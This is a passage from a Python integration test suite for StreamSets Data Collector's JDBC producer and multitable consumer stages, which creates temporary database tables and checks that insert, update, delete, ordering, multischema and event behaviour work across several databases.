{'field': 'field5', 'type': 'DOUBLE'}
]
batch_size = 10000
dev_data_generator.set_attributes(delay_between_batches=0, batch_size=batch_size)
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('field1', sqlalchemy.String(50)),
sqlalchemy.Column('field2', sqlalchemy.DateTime),
sqlalchemy.Column('field3', sqlalchemy.Integer),
sqlalchemy.Column('field4', sqlalchemy.DECIMAL(10, 2)),
sqlalchemy.Column('field5', sqlalchemy.Float),
schema=None)
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
FIELD_MAPPINGS = [dict(field='/field1', columnName='field1', dataType='STRING'),
dict(field='/field2', columnName='field2', dataType='DATETIME'),
dict(field='/field3', columnName='field3', dataType='INTEGER'),
dict(field='/field4', columnName='field4', dataType='DECIMAL'),
dict(field='/field5', columnName='field5', dataType='FLOAT')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation='INSERT',
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='TO_ERROR')
dev_data_generator >> jdbc_producer
pipeline = pipeline_builder.build(title="JDBC producer multiple types")
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(batch_size, timeout_sec=3600)
snapshot = sdc_executor.capture_snapshot(pipeline).snapshot
sdc_executor.stop_pipeline(pipeline).wait_for_stopped()
result = database.engine.execute(table.select())
        data_from_database = sorted(result.fetchall(), key=lambda row: row[1])  # order by field2
result.close()
assert len(data_from_database) > batch_size
stage = snapshot[jdbc_producer.instance_name]
assert len(stage.error_records) == 0
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
# SDC-10786: This test intends to cover the case really precise decimals being inserted into a Float column in MSSQL
@database('sqlserver')
def test_mssql_producer_bigdecimal(sdc_builder, sdc_executor, database):
"""
Insert a Decimal value with up to 38 decimals into a Float column in MSSQL.
This will look like:
dev_data_generator >> jdbc_producer
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = sqlalchemy.Table(
table_name,
sqlalchemy.MetaData(),
sqlalchemy.Column('a_value', sqlalchemy.Float()),
sqlalchemy.Column('b_value', sqlalchemy.Float()),
sqlalchemy.Column('c_value', sqlalchemy.Float()),
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, autoincrement=False)
)
table.create(database.engine)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_data_generator = pipeline_builder.add_stage('Dev Data Generator')
dev_data_generator.fields_to_generate = [{'field': 'id', 'type': 'INTEGER'},
{'field': 'a_value', 'precision': 50, 'scale': 40, 'type': 'DECIMAL'},
{'field': 'b_value', 'precision': 5, 'scale': 2, 'type': 'DECIMAL'},
{'field': 'c_value', 'type': 'DECIMAL'}]
dev_data_generator.batch_size = 1
FIELD_MAPPINGS = [dict(field='/id', columnName='id'),
dict(field='/a_value', columnName='a_value'),
dict(field='/b_value', columnName='b_value'),
dict(field='/c_value', columnName='c_value')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation='INSERT',
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
dev_data_generator >> jdbc_producer
pipeline = pipeline_builder.build('MSSQL BigDecimal')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True, wait=True).snapshot
sdc_executor.stop_pipeline(pipeline)
records = [record.field for record in snapshot[dev_data_generator.instance_name].output]
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[0]) # order by id
result.close()
assert len(data_from_database) == 1
assert math.isclose(float(str(records[0]['a_value'])), data_from_database[0][0], rel_tol=0.02)
assert math.isclose(float(str(records[0]['b_value'])), data_from_database[0][1], rel_tol=0.02)
assert math.isclose(float(str(records[0]['c_value'])), data_from_database[0][2], rel_tol=0.02)
assert math.isclose(float(str(records[0]['id'])), data_from_database[0][3], rel_tol=0.02)
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_coerced_insert(sdc_builder, sdc_executor, database):
"""Extension of the Simple JDBC Producer test with INSERT operation.
The pipeline inserts records into the database.
In one record, data is represented as type String, where column is type Integer.
This should be passed to the database to coerce.
Verify that correct data is in the database.
Please note the use of local COERCE_ROWS_IN_DATABASE to insert
and global ROWS_IN_DATABASE to verify.
COERCE_ has id (integer) set to string.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
COERCE_ROWS_IN_DATABASE = [
{'id': '1', 'name': 'Dima'},
{'id': '2', 'name': 'Jarcec'},
{'id': '3', 'name': 'Arvind'}
]
DATA = '\n'.join(json.dumps(rec) for rec in COERCE_ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Insert', DATA, table_name, 'INSERT')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_delete(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with DELETE operation.
    The pipeline deletes records from the database and verifies that the correct data remains in the database.
Records are deleted if the primary key is matched irrespective of other column values.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_TO_UPDATE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Delete', DATA, table_name, 'DELETE')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_TO_UPDATE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = result.fetchall()
result.close()
removed_ids = [record['id'] for record in ROWS_TO_UPDATE]
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE if
record['id'] not in removed_ids]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_update(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with UPDATE operation.
    The pipeline updates records in the database and verifies that the correct data is in the database.
    Records with a matching primary key are updated; unmatched records are left unchanged.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_TO_UPDATE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Update', DATA, table_name, 'UPDATE')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_TO_UPDATE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
updated_names = {record['id']: record['name'] for record in ROWS_IN_DATABASE}
updated_names.update({record['id']: record['name'] for record in ROWS_TO_UPDATE})
assert data_from_database == [(updated_names[record['id']], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
# SDC-10987: JDBC Multitable Consumer multiple offset columns with initial offset
@database
def test_jdbc_multitable_consumer_initial_offset_at_the_end(sdc_builder, sdc_executor, database):
"""
Set initial offset at the end of the table and verify that no records were read.
"""
table_name = get_random_string(string.ascii_lowercase, 10)
builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.table_configs = [{
"tablePattern": table_name,
"overrideDefaultOffsetColumns": True,
"offsetColumns": ["id"],
"offsetColumnToInitialOffsetValue": [{
"key": "id",
"value": "5"
}]
}]
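    # The initial offset (id = 5) is beyond the highest id in ROWS_IN_DATABASE, so the origin should read no rows.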
trash = builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, quote=True),
sqlalchemy.Column('name', sqlalchemy.String(32), quote=True)
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline)
# Since the pipeline is not meant to read anything, we 'simply' wait
time.sleep(5)
sdc_executor.stop_pipeline(pipeline)
# There must be no records read
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 0
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
# SDC-10562: Row-level stage errors not being caught at pipeline
@sdc_min_version('3.0.0.0')
@database
def test_jdbc_producer_multirow_with_duplicates(sdc_builder, sdc_executor, database):
"""
    Make sure that when using multi-row insert, data-related errors are sent to the error stream.
"""
if type(database) == SQLServerDatabase:
pytest.skip('This test is trying to insert explicit value to identity column which is not supported on SQL Server')
table_name = get_random_string(string.ascii_lowercase, 15)
builder = sdc_builder.get_pipeline_builder()
# Generate batch that will repeat the same primary key in the middle of the batch (on third row)
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'JSON'
source.raw_data = """{"id" : 1}\n{"id" : 2}\n{"id" : 1}\n{"id" : 3}"""
producer = builder.add_stage('JDBC Producer')
producer.table_name = table_name
producer.field_to_column_mapping = []
producer.default_operation = 'INSERT'
producer.use_multi_row_operation = True
if database.type == 'Oracle':
producer.enclose_object_names = True
source >> producer
pipeline = builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, quote=True)
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
# Since we are inserting duplicate primary key, the batch should fail
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 4
assert history.latest.metrics.counter('pipeline.batchErrorRecords.counter').count == 4
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
# And similarly the database side should be empty as well
result = database.engine.execute(table.select())
data_from_database = result.fetchall()
result.close()
assert len(data_from_database) == 0
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_multitable(sdc_builder, sdc_executor, database):
"""Test for JDBC Producer with multiple destination table. We create 3 tables in the default schema and use an EL
expression to insert records according to the /table record field.
Pipeline:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
table1_name = _get_random_name(database, prefix='stf_table_')
table2_name = _get_random_name(database, prefix='stf_table_')
table3_name = _get_random_name(database, prefix='stf_table_')
table1 = _create_table(table1_name, database)
table2 = _create_table(table2_name, database)
table3 = _create_table(table3_name, database)
ROWS = [{'table': table1_name, 'id': 1, 'name': 'Roger Federer'},
{'table': table2_name, 'id': 2, 'name': 'Rafael Nadal'},
{'table': table3_name, 'id': 3, 'name': 'Dominic Thiem'}]
INPUT_DATA = '\n'.join(json.dumps(rec) for rec in ROWS)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Multitable Insert', INPUT_DATA,
"${record:value('/table')}", 'INSERT')
# JDBC Producer's "Table Name" property is converted to uppercase through the configure_for_environment() method
# when database is Oracle. However EL function names are case-sensitive; we overwrite it afterwards to avoid an EL
# error.
pipeline.configure_for_environment(database)
pipeline[2].set_attributes(table_name="${record:value('/table')}")
# For Oracle, the default value of JDBC Producer's "Schema Name" property in the database environment is the
# database name, but it should be the username instead.
if isinstance(database, OracleDatabase):
pipeline[2].set_attributes(schema_name=database.username.upper())
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS))
sdc_executor.stop_pipeline(pipeline)
result1 = database.engine.execute(table1.select())
result2 = database.engine.execute(table2.select())
result3 = database.engine.execute(table3.select())
data1 = result1.fetchall()
data2 = result2.fetchall()
data3 = result3.fetchall()
assert data1 == [(ROWS[0]['name'], ROWS[0]['id'])]
assert data2 == [(ROWS[1]['name'], ROWS[1]['id'])]
assert data3 == [(ROWS[2]['name'], ROWS[2]['id'])]
result1.close()
result2.close()
result3.close()
finally:
logger.info('Dropping tables %s, %s, %s in %s database...', table1_name, table2_name, table3_name,
database.type)
table1.drop(database.engine)
table2.drop(database.engine)
table3.drop(database.engine)
# Test SDC-10719
@database
@sdc_min_version('3.8.0')
def test_jdbc_producer_multischema(sdc_builder, sdc_executor, database):
"""Test for JDBC Producer in a multischema scenario with a single destination table for each schema. We create 3
schemas with one table for each, with the same name. Then we use an EL expression to insert records according to
the /schema record field.
Pipeline:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
schema1_name = _get_random_name(database, prefix='stf_schema_')
schema2_name = _get_random_name(database, prefix='stf_schema_')
schema3_name = _get_random_name(database, prefix='stf_schema_')
table_name = _get_random_name(database, prefix='stf_table_')
_create_schema(schema1_name, database)
_create_schema(schema2_name, database)
_create_schema(schema3_name, database)
table1 = _create_table(table_name, database, schema_name=schema1_name)
table2 = _create_table(table_name, database, schema_name=schema2_name)
table3 = _create_table(table_name, database, schema_name=schema3_name)
ROWS = [{'schema': schema1_name, 'id': 1, 'name': 'Roger Federer'},
{'schema': schema2_name, 'id': 2, 'name': 'Rafael Nadal'},
{'schema': schema3_name, 'id': 3, 'name': 'Dominic Thiem'}]
INPUT_DATA = '\n'.join(json.dumps(rec) for rec in ROWS)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Multischema Insert', INPUT_DATA,
table_name, 'INSERT')
# JDBC Producer's "Schema Name" property is set through the `database` environment under some circumstances
# (e.g. Sql Server database). We overwrite it afterwards for the test.
pipeline.configure_for_environment(database)
pipeline[2].set_attributes(schema_name="${record:value('/schema')}")
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS))
sdc_executor.stop_pipeline(pipeline)
result1 = database.engine.execute(table1.select())
result2 = database.engine.execute(table2.select())
result3 = database.engine.execute(table3.select())
data1 = result1.fetchall()
data2 = result2.fetchall()
data3 = result3.fetchall()
assert data1 == [(ROWS[0]['name'], ROWS[0]['id'])]
assert data2 == [(ROWS[1]['name'], ROWS[1]['id'])]
assert data3 == [(ROWS[2]['name'], ROWS[2]['id'])]
result1.close()
result2.close()
result3.close()
finally:
logger.info('Dropping table %s in schemas...', table_name)
table1.drop(database.engine)
table2.drop(database.engine)
table3.drop(database.engine)
logger.info('Dropping schemas %s, %s, %s...', schema1_name, schema2_name, schema3_name)
_drop_schema(schema1_name, database)
_drop_schema(schema2_name, database)
_drop_schema(schema3_name, database)
# Test SDC-10719
@database
@sdc_min_version('3.8.0')
def test_jdbc_producer_multischema_multitable(sdc_builder, sdc_executor, database):
"""Test a JDBC Producer in a multischema scenario with different destination tables for each schema. We create 3
    schemas with one table in each, using different table names. Then we use EL expressions to insert records according
    to the /schema and /table record fields.
    There was a limitation in previous versions that affected MySQL and MemSQL. These RDBMSs do not differentiate
    between schema and database. SDC used the database configured in the JDBC connection string and looked up database
    metadata filtering by database+schema. If the schema differed from the database in the connection string, the
    metadata could not be retrieved. This was a problem in a multischema scenario, where several schemas are employed.
Pipeline:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
schema1_name = _get_random_name(database, prefix='stf_schema_')
schema2_name = _get_random_name(database, prefix='stf_schema_')
schema3_name = _get_random_name(database, prefix='stf_schema_')
table1_name = _get_random_name(database, prefix='stf_table_')
table2_name = _get_random_name(database, prefix='stf_table_')
table3_name = _get_random_name(database, prefix='stf_table_')
_create_schema(schema1_name, database)
_create_schema(schema2_name, database)
_create_schema(schema3_name, database)
table1 = _create_table(table1_name, database, schema_name=schema1_name)
table2 = _create_table(table2_name, database, schema_name=schema2_name)
table3 = _create_table(table3_name, database, schema_name=schema3_name)
ROWS = [{'schema': schema1_name, 'table': table1_name, 'id': 1, 'name': 'Roger Federer'},
{'schema': schema2_name, 'table': table2_name, 'id': 2, 'name': 'Rafael Nadal'},
{'schema': schema3_name, 'table': table3_name, 'id': 3, 'name': 'Dominic Thiem'}]
INPUT_DATA = '\n'.join(json.dumps(rec) for rec in ROWS)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Multischema and Multitable Insert',
INPUT_DATA, "${record:value('/table')}", 'INSERT')
# JDBC Producer's "Schema Name" property is set through the `database` environment under some circumstances
# (e.g. Sql Server database). We overwrite it afterwards for the test.
pipeline.configure_for_environment(database)
pipeline[2].set_attributes(schema_name="${record:value('/schema')}")
# JDBC Producer's "Table Name" property is converted to uppercase through the configure_for_environment() method
# when database is Oracle. However EL function names are case-sensitive; we overwrite it afterwards to avoid an EL
# error.
pipeline[2].set_attributes(table_name="${record:value('/table')}")
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS))
sdc_executor.stop_pipeline(pipeline)
result1 = database.engine.execute(table1.select())
result2 = database.engine.execute(table2.select())
result3 = database.engine.execute(table3.select())
data1 = result1.fetchall()
data2 = result2.fetchall()
data3 = result3.fetchall()
assert data1 == [(ROWS[0]['name'], ROWS[0]['id'])]
assert data2 == [(ROWS[1]['name'], ROWS[1]['id'])]
assert data3 == [(ROWS[2]['name'], ROWS[2]['id'])]
result1.close()
result2.close()
result3.close()
finally:
logger.info('Dropping tables %s, %s, %s...', table1_name, table2_name, table3_name)
table1.drop(database.engine)
table2.drop(database.engine)
table3.drop(database.engine)
logger.info('Dropping schemas %s, %s, %s...', schema1_name, schema2_name, schema3_name)
_drop_schema(schema1_name, database)
_drop_schema(schema2_name, database)
_drop_schema(schema3_name, database)
# SDC-11063: Do not reorder update statements in JDBC destination
@sdc_min_version('3.0.0.0')
@pytest.mark.parametrize('multi_row', [True, False])
@database
def test_jdbc_producer_ordering(sdc_builder, sdc_executor, multi_row, database):
"""Ensure that variously intertwined operations won't be executed out of order in harmful way."""
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, quote=True, autoincrement=False),
sqlalchemy.Column('a', sqlalchemy.Integer, quote=True),
sqlalchemy.Column('b', sqlalchemy.Integer, quote=True)
)
RAW_DATA = [
# Update id=5
{"op": 3, "id": 5, "a": 2, "b": 2},
# Insert id=4
{"op": 1, "id": 4, "a": 1, "b": 1},
# Update id=4
{"op": 3, "id": 4, "a": 2, "b": 2},
# Delete id=5
{"op": 2, "id": 5},
# Insert id=1
{"op": 1, "id": 1, "a": 1, "b": 1},
# Update id=1
{"op": 3, "id": 1, "a": 2},
# Insert id=2
{"op": 1, "id": 2, "a": 1, "b": 1},
# Delete id=2
{"op": 2, "id": 2},
# Update id=1
{"op": 3, "id": 1, "a": 2, "b": 2},
# Insert id=3
{"op": 1, "id": 3, "a": 1, "b": 1},
# Update id=1
{"op": 3, "id": 1, "a": 3},
# Update id=3
{"op": 3, "id": 3, "a": 5},
# Delete id=3
{"op": 2, "id": 3}
]
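    # The 'op' field is mapped to the sdc.operation.type header below; in SDC the codes are
    # 1 = INSERT, 2 = DELETE, 3 = UPDATE. Applying the operations above in order to a table that
    # starts with the single row (id=5, a=1, b=1) should leave exactly two rows:
    #     id=1 -> a=3, b=2 and id=4 -> a=2, b=2
    # which is what the assertions at the end of this test check.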
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'JSON'
source.raw_data = '\n'.join(json.dumps(rec) for rec in RAW_DATA)
expression = builder.add_stage('Expression Evaluator')
expression.header_attribute_expressions = [
{'attributeToSet': 'sdc.operation.type', 'headerAttributeExpression': '${record:value("/op")}'}
]
remover = builder.add_stage('Field Remover')
remover.set_attributes(fields=['/op'], action='REMOVE')
producer = builder.add_stage('JDBC Producer')
producer.field_to_column_mapping = []
producer.default_operation = 'UPDATE'
producer.table_name = table_name
producer.use_multi_row_operation = multi_row
if database.type == 'Oracle':
producer.enclose_object_names = True
source >> expression >> remover >> producer
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
        # The table will start with a single row (id=5)
logger.info('Inserting rows into %s in %s database', table_name, database.type)
connection = database.engine.connect()
connection.execute(table.insert(), {'id': 5, 'a': 1, 'b': 1})
        # Finally run the pipeline and verify its outcome
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[0]) # order by id
result.close()
assert len(db) == 2
# id=1
assert 1 == db[0][0]
assert 3 == db[0][1]
assert 2 == db[0][2]
        # id=4
assert 4 == db[1][0]
assert 2 == db[1][1]
assert 2 == db[1][2]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('3.0.0.0')
@database
def test_jdbc_multitable_events(sdc_builder, sdc_executor, database):
"""
Validate that we properly generate events
"""
if database.type == 'Oracle':
pytest.skip("This test depends on auto-created ID that doesn't work properly on Oracle")
table_prefix = get_random_string(string.ascii_lowercase, 20)
table_a = '{}_a'.format(table_prefix)
table_b = '{}_b'.format(table_prefix)
table_events = '{}_events'.format(table_prefix)
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('JDBC Multitable Consumer')
source.transaction_isolation = 'TRANSACTION_READ_COMMITTED'
source.table_configs = [{
'tablePattern': f'{table_prefix}%',
"enableNonIncremental": True,
'tableExclusionPattern': table_events
}]
trash = builder.add_stage('Trash')
expression = builder.add_stage('Expression Evaluator')
expression.field_expressions = [{
'fieldToSet': '/tbl',
'expression': '${record:value("/table")}${record:value("/tables[0]")}'
}, {
'fieldToSet': '/tbls',
'expression': '${record:value("/tables[0]")},${record:value("/tables[1]")}'
}, {
'fieldToSet': '/event',
'expression': '${record:eventType()}'
}
]
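    # The expressions above rely on the event record layout: 'table-finished' events carry a /table field,
    # while 'schema-finished' events carry a /tables list, so /tbl resolves to whichever of the two is present
    # and /tbls joins the first two entries of that list (empty strings otherwise).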
producer = builder.add_stage('JDBC Producer')
producer.table_name = table_events
producer.default_operation = 'INSERT'
producer.field_to_column_mapping = [
dict(field='/event', columnName='event'),
dict(field='/tbl', columnName='tbl'),
dict(field='/tbls', columnName='tbls')
]
source >> trash
source >= expression
expression >> producer
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
# We need three tables for this test
metadata = sqlalchemy.MetaData()
a = sqlalchemy.Table(
table_a,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True)
)
b = sqlalchemy.Table(
table_b,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=False)
)
events = sqlalchemy.Table(
table_events,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('event', sqlalchemy.String(50)),
sqlalchemy.Column('tbl', sqlalchemy.String(150)),
sqlalchemy.Column('tbls', sqlalchemy.String(150))
)
try:
logger.info('Creating tables %s, %s and %s in %s database ...', table_a, table_b, table_events, database.type)
a.create(database.engine)
b.create(database.engine)
events.create(database.engine)
logger.info('Inserting rows into %s and %s', table_a, table_b)
connection = database.engine.connect()
connection.execute(a.insert(), {'id': 1})
connection.execute(b.insert(), {'id': 1})
# Start the pipeline
status = sdc_executor.start_pipeline(pipeline)
        # Two data records are read and four events generated, for six output records in total
status.wait_for_pipeline_output_records_count(6)
result = database.engine.execute(events.select())
        db = sorted(result.fetchall(), key=lambda row: row[0])  # order by id (creation order)
result.close()
assert len(db) == 4
tbls = set()
assert 'table-finished' == db[0][1]
tbls.add(db[0][2])
assert 'table-finished' == db[1][1]
tbls.add(db[1][2])
assert table_a in tbls
assert table_b in tbls
assert 'schema-finished' == db[2][1]
tbls = set(db[2][3].split(","))
assert table_a in tbls
assert table_b in tbls
assert 'no-more-data' == db[3][1]
# Portable truncate
events.drop(database.engine)
events.create(database.engine)
# Second iteration - insert one new row
logger.info('Inserting rows into %s', table_a)
connection = database.engine.connect()
connection.execute(a.insert(), {'id': 2})
        # One more data record and three more events, bringing the total output record count to 10
status.wait_for_pipeline_output_records_count(10)
result = database.engine.execute(events.select())
        db = sorted(result.fetchall(), key=lambda row: row[0])  # order by id (creation order)
result.close()
assert len(db) == 3
assert 'table-finished' == db[0][1]
assert table_a == db[0][2]
assert 'schema-finished' == db[1][1]
tbls = set(db[1][3].split(","))
assert table_a in tbls
assert table_b in tbls
assert 'no-more-data' == db[2][1]
# Now let's stop the pipeline and start it again
# SDC-10022: Multitable JDBC Origin with non-incremental table does not properly trigger 'no-more-data' event
sdc_executor.stop_pipeline(pipeline)
# Portable truncate
events.drop(database.engine)
events.create(database.engine)
# Start the pipeline and wait for it to read three records (3 events)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(3)
assert 'table-finished' == db[0][1]
assert table_a == db[0][2]
assert 'schema-finished' == db[1][1]
tbls = set(db[1][3].split(","))
assert table_a in tbls
assert table_b in tbls
assert 'no-more-data' == db[2][1]
finally:
sdc_executor.stop_pipeline(pipeline)
logger.info('Dropping tables %s, %s and %s in %s database...', table_a, table_b, table_events, database.type)
a.drop(database.engine)
b.drop(database.engine)
events.drop(database.engine)
# SDC-11092: Improve the ability of JDBC Destination to cover non-standard Data related SQL Error codes
@sdc_min_version('3.0.0.0')
@pytest.mark.parametrize('multi_row', [True, False])
@database('oracle')
def test_jdbc_producer_oracle_data_errors(sdc_builder, sdc_executor, multi_row, database):
"""Ensure that data related error in Oracle will be sent to eror stream rather then shutting the pipeline down."""
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('ID', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('STR', sqlalchemy.String(2)),
)
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'JSON'
source.raw_data = '{"ID" : 1, "STR": "Longer then 2 characters"}'
producer = builder.add_stage('JDBC Producer')
producer.field_to_column_mapping = []
producer.default_operation = 'INSERT'
producer.table_name = table_name
producer.use_multi_row_operation = multi_row
source >> producer
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
# The table in database needs to be empty
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[0]) # order by id
result.close()
assert len(db) == 0
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
assert history.latest.metrics.counter('pipeline.batchErrorRecords.counter').count == 1
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
# SDC-11082: Extend support for TIMESTAMP WITH TIMEZONE Datatypes
@sdc_min_version('3.0.0.0')
@database('oracle')
# https://docs.oracle.com/cd/B28359_01/server.111/b28318/datatype.htm#CNCPT1821
# We don't support UriType (requires difficult workaround in JDBC)
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('number', '1', 'DECIMAL', '1'),
('char(2)', "'AB'", 'STRING', 'AB'),
('varchar(4)', "'ABCD'", 'STRING', 'ABCD'),
('varchar2(4)', "'NVAR'", 'STRING', 'NVAR'),
('nchar(3)', "'NCH'", 'STRING', 'NCH'),
('nvarchar2(4)', "'NVAR'", 'STRING', 'NVAR'),
('binary_float', '1.0', 'FLOAT', '1.0'),
('binary_double', '2.0', 'DOUBLE', '2.0'),
('date', "TO_DATE('1998-1-1 6:22:33', 'YYYY-MM-DD HH24:MI:SS')", 'DATETIME', 883635753000),
('timestamp', "TIMESTAMP'1998-1-2 6:00:00'", 'DATETIME', 883720800000),
